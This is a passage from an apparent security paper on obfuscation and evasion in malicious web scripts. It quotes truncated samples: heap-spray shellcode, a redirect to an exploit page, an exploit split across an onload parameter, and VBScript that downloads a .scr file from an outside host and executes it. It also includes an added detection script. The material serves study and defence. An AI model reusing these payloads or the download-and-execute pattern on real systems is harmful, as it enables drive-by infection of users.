Introduction
The web is the predominant infection vector today, with over 70 percent of attacks happening
over the web. The large installed base of unpatched browsers and browser plug-ins gives
attackers very good success ratios. Client-side scripts embedded in web pages are the
major enablers of these attacks. As the anti-malware industry steps up its efforts to protect
against these malicious scripts, attackers are becoming very innovative in their delivery,
obfuscation and evasion techniques.
function Check()
{
var shellcode1 =
unescape("%u9090%u6090%u17eb%u645e%u30a1%u0000"+"%u0500%u0800%u0000%uf88b.
………………………………………………………………………………………………………………..
e61%u3633%u2e30%u6f63%u2f6d%u7230%u326c%u652e%u6578%u0000");
var bigblock=unescape("%u0C0C%u0C0C");
var headersize=20;
var slackspace=headersize+shellcode1.length;
while(bigblock.length<slackspace)
bigblock+=bigblock;
var fillblock=bigblock.substring(0,slackspace);
var block=bigblock.substring(0,bigblock.length-slackspace);
while(block.length+slackspace < 0x40000)
block=block+block+fillblock;
var memory=new Array();
for(i=0; i<400; i++) {
memory[i] = block+shellcode1
}
var buf = '';
while (buf.length < 32)
buf = buf + unescape("%0C");
var m = '';
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
}
Typically such a script found in the wild is heavily obfuscated as a first layer of defense
against detection. Scripts employ several further techniques on top of this to evade detection
even after decryption.
Several shellcode encryptors with anti-static and anti-dynamic-analysis features are
available, and they prevent easy identification of shellcode elements in the script. ASCII-
encoded shellcodes such as the alpha family make the task even more difficult because of false-
positive concerns.
The rest of the code, as we can see, is dynamic code, which makes pattern
identification very challenging. Dynamic script generation using the DOM document class is
another method actively used by attackers in the wild to evade detection. Such techniques
are effective in wearing down the detection logic and also in throwing off
heuristics that determine whether code has been decrypted.
document.writeln("<SCRIPT language=\"JavaScript\">");
document.writeln("var goodflow = \"%u9090%u6090\" +");
document.writeln("\"%u17eb%u645e%u30a1%u0000\" +");
……….
document.writeln("</SCRIPT>");
Distributed Scripts
function CheckAndRedirect() {
var user = navigator.userAgent.toLowerCase();
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
if (RealVersion.indexOf("6.0.10.") != -1)
Exploit = 1;
……..
switch (Exploit) {
case 1:
location.href = "http://malfake.cn/exp1.htm";
break;
……………..
}
}
3. Exploit Splitting
Many kinds of exploit splitting can be seen in the wild as a way to evade detection: using multiple
script sections, splitting the exploit between remote .js files and embedded HTML, and passing the
shellcode as a parameter to an event trigger are some of them. The following snippet from a real-world
sample uses a bloated onload event parameter for splitting.
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
function ubYc37hHe(hvc3y5y7g, B32DS636x){var Ae6Jhd3a0 = arguments.callee;var
bNdsR3Fm2 = location.href;Ae6Jhd3a0 = Ae6Jhd3a0.toString();Ae6Jhd3a0 =
A6e85797e926d797a7079846F687678896E77799d6868797a6d747a6b686A787a6e7779
…………………………………………………………………………………………….
89A56f68687b7c79767c7B737879787075856b736A7B8699757c7B696b8389707D847e
727577A9797b7c696969837D6F747B7F92977B7B6DA77a6B6665768B98A8779f6664
696e72');
</script>
</head>
<body
onload="ubYc37hHe('97a9b0a8ABADB2a751a17989AC77AA6f83a86Aa6887b8a71a2
80B4796364B68663A6a3AA83959a62ACAAa3B7579D76a063688E8E7cBB63765195
B……………………………………………………………………………………………
707D847e727577A9797b7c696969837D6F747B7F92977B7B6DA77a6B6665768B98A
8779f6664696e72')">
</body>
</html>
Multilingual Scripts
A class of JavaScript attacks that dynamically writes the exploit script block in another
scripting language (such as VBScript) is seen in the wild. This can easily throw off the JavaScript
analyzers in anti-malware engines.
<script LANGUAGE="Javascript">
document.write(unescape("%0D%0A%3Cscript%20language%3D%22VBScript
%22%3E%0D%0A%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0
A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20 ...
D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%3C/html%3E"));
</script>
Code like this gets transformed into the following XML exploit in VBScript.
<script language="VBScript">
dl = "http://foto02122006.xxx.ru/foto.scr"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"") S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
Additional back and forth transformations can also be seen in the wild.
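The following added example (not code from the paper) is a small JavaScript pre-pass that peels the unescape() layer off a script so that detection can inspect what the script would actually spray or write: it flags the %u0C0C filler and %u9090 sled literals seen in the first sample, and the nested VBScript hand-off seen in the last one. The sample input is constructed and the function names are my own.

```javascript
// Added example, not code from the paper: decode the unescape() literals of a
// script so detection can inspect the layer it would spray or write into the page.
// unescape() semantics: %uXXXX is one UTF-16 unit, %XX one byte, else pass-through.
function decodeUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}
// Collect every unescape("..." + '...') argument, joining adjacent string
// literals as the + operator would at run time, and return it decoded.
function extractUnescapeLayers(src) {
  const lit = `(?:"[^"]*"|'[^']*')`;
  const re = new RegExp(`unescape\\s*\\(\\s*(${lit}(?:\\s*\\+\\s*${lit})*)\\s*\\)`, 'g');
  const layers = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    layers.push(decodeUnescape(m[1].replace(/["']\s*\+\s*["']/g, '').slice(1, -1)));
  }
  return layers;
}
// Languages of any <script> tag the decoded layer would write into the
// document (the JavaScript-to-VBScript hand-off described above).
function nestedScriptLanguages(decoded) {
  const re = /<script[^>]*\blanguage\s*=\s*["']?([A-Za-z]+)/gi;
  const langs = [];
  let m;
  while ((m = re.exec(decoded)) !== null) langs.push(m[1].toLowerCase());
  return langs;
}
// Heap-spray hints from the first sample: a literal made of one repeated unit
// (the %u0C0C filler) and a literal containing a NOP sled (%u9090). Alphanumeric
// shellcode defeats the sled check, so these are hints, not verdicts.
function analyzeScript(src) {
  const layers = extractUnescapeLayers(src);
  return {
    layers: layers.length,
    nestedLanguages: layers.flatMap(nestedScriptLanguages),
    fillerLiterals: layers.filter((d) => /^(.)\1+$/.test(d)).length,
    nopSledLiterals: layers.filter((d) => d.includes('\u9090')).length,
  };
}

// Constructed input modelled on the sprayer and the VBScript hand-off above.
const SAMPLE = [
  'var shellcode1 = unescape("%u9090%u6090%u17eb%u645e" + "%u30a1%u0000");',
  'var bigblock = unescape("%u0C0C%u0C0C");',
  'document.write(unescape("%3Cscript%20language%3D%22VBScript%22%3E' +
    'on%20error%20resume%20next%3C/script%3E"));',
].join('\n');
console.log(JSON.stringify(analyzeScript(SAMPLE)));
```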
1. Function Redefinitions
One technique analysis engines typically use is to replace interesting functions such as eval
with common debugging functions such as print. The output of these functions provides
significantly less complex code for analysis; in many cases it yields completely
decrypted JavaScript code. JavaScript allows functions to be redefined within the
script body, and many malicious scripts redefine debugging functions such as print to local
script functions as an anti-analysis technique. The alert in the code below results in exiting the
script.
<script>
var str="alpanert";
var str2=str.replace("pan","");
str2 = quit;
alert(str2);
</script>
<script>
a && bi; function asd2 () {alert("two");}
</script>
<script>
asd = asd2; asd();
</script>
<script>
var loaded_image = 0;
function image_set() { loaded_image = 1; }
function do_mal() { if (loaded_image == 1) malicious……. }
</script>
<img src='http//foooo//check.jpg' onload="image_set();">